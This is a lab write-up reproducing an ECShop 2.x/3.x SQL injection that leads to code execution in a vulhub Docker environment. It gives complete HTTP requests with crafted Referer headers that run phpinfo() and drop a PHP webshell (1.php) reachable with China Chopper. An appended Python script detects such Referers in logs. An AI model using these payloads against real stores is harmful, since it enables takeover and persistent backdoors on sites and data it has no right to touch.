ECShop 2.x/3.x SQL Injection / Arbitrary Code Execution Vulnerability

ECShop is a B2C standalone online shop system suited to enterprises and individuals who want to build a customized web store quickly. It is a cross-platform open-source application built on PHP and a MySQL database.

Versions from 2017 and earlier contain a SQL injection vulnerability through which malicious data can be injected, ultimately leading to arbitrary code execution. The latest release, 3.6.0, has fixed the vulnerability; vulhub reproduces it with the latest 2.7.3 release and the second-latest 3.6.0 release.


Vulnerable environment

We first download the environment; someone has already put together a Docker environment on GitHub, so we can use it directly.

git clone git://github.com/vulhub/vulhub.git
cd vulhub/ecshop/xianzhi-2017-02-82239600/
docker-compose up -d

Visit IP:8080 to reach the ECShop 2.7.3 installation page.

Configure the installation as shown; the database password is root.

The 2.7.3 environment is now set up.

Visit IP:8081 to reach the ECShop 3.6.0 installation page.

Configure the installation as shown; the database password is root.

The 3.6.0 environment is now set up.


Affected versions

Ecshop 2.x

Ecshop 3.x-3.6.0


Reproducing the vulnerability

Ecshop 2.x

Click the user page and capture the request, then modify the Referer value to check whether the vulnerability exists; the payload is as follows.

GET /user.php HTTP/1.1
Host: 192.168.200.23:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

phpinfo() is executed successfully, confirming code execution.

Next we upload a webshell; the payload is as follows.

GET /user.php HTTP/1.1
Host: 192.168.200.23:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
Content-Length: 0
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

The uploaded webshell is named 1.php with password EDI, and the Caidao (China Chopper) connection succeeds.

Ecshop 3.x

Click the user page and capture the request, then modify the Referer value to check whether the vulnerability exists; the payload is as follows.

GET /user.php HTTP/1.1
Host: 192.168.200.23:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

phpinfo() is executed successfully, confirming code execution.

Next we upload a webshell; the payload is as follows.

GET /user.php HTTP/1.1
Host: 192.168.200.23:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:286:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152625255524a58536b374944382b4a796b3d2729293b2f2f7d787878,10-- -";s:2:"id";s:9:"' union/*";}
Connection: close
Cookie: ECS[visit_times]=8; ECS_ID=c92fa83bedb48ab3f1e7bb62c6b20e57a7728bea
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

The uploaded webshell is named 1.php with password EDI, and the Caidao (China Chopper) connection succeeds.
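Both the 2.x and 3.x requests above share one shape: the Referer carries a 32-hex-character key, the literal ads|, and a serialized PHP array whose string values hold SQL fragments and hex-encoded PHP. The following added example (my own detection code, not part of the original post or of ECShop or vulhub) checks a Referer value for that shape, decodes the 0x hex literals so keyword matching sees what they conceal, and returns a verdict an analyst can apply to web-server access logs. The sample Referer values are constructed, modelled on the requests shown above.

```python
import re

# Constructed sample Referer values modelled on this page's requests (not live log data).
SAMPLE_REFERERS = {
    "benign": "http://192.168.200.23:8080/index.php?act=login",
    "probe": ('554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,'
              '0x2d312720554e494f4e2f2a,2,4,5,6,7,8,'
              '0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";'
              's:2:"id";s:11:"-1\' UNION/*";}'),
}

# 32-hex key + "ads|" + serialized PHP array, exactly the prefix seen in the payloads above.
ADS_PREFIX = re.compile(r'^[0-9a-f]{32}ads\|a:\d+:\{', re.IGNORECASE)
# MySQL hex literals; a Referer has no business carrying these.
HEX_LITERAL = re.compile(r'0x([0-9a-fA-F]{2,})')
SQL_MARKERS = re.compile(r'\b(union|select)\b|--\s|/\*|\*/', re.IGNORECASE)
PHP_MARKERS = re.compile(r'phpinfo|assert|eval|base64_decode|\$_(GET|POST|REQUEST)', re.IGNORECASE)


def decode_hex_literals(text):
    """Decode every even-length 0x... literal to text (latin-1 never raises)."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        h = m.group(1)
        if len(h) % 2 == 0:
            decoded.append(bytes.fromhex(h).decode("latin-1"))
    return decoded


def inspect_referer(referer):
    """Return evidence dict; 'suspicious' is True when the ads| serialized array
    carries SQL markers or decodes to PHP function names."""
    findings = {
        "serialized_ads": bool(ADS_PREFIX.match(referer)),
        "sql_markers": sorted({m.group(0).strip() for m in SQL_MARKERS.finditer(referer)}),
        "decoded_hex": decode_hex_literals(referer),
        "php_markers": [],
    }
    for chunk in findings["decoded_hex"]:
        findings["php_markers"] += [m.group(0) for m in PHP_MARKERS.finditer(chunk)]
    findings["suspicious"] = findings["serialized_ads"] and bool(
        findings["sql_markers"] or findings["php_markers"])
    return findings


if __name__ == "__main__":
    for name, ref in SAMPLE_REFERERS.items():
        print(name, inspect_referer(ref))
```

A plain Referer that merely contains the word "select" is not flagged, because the verdict also requires the ads| serialized-array prefix; tune the marker lists to your own log noise.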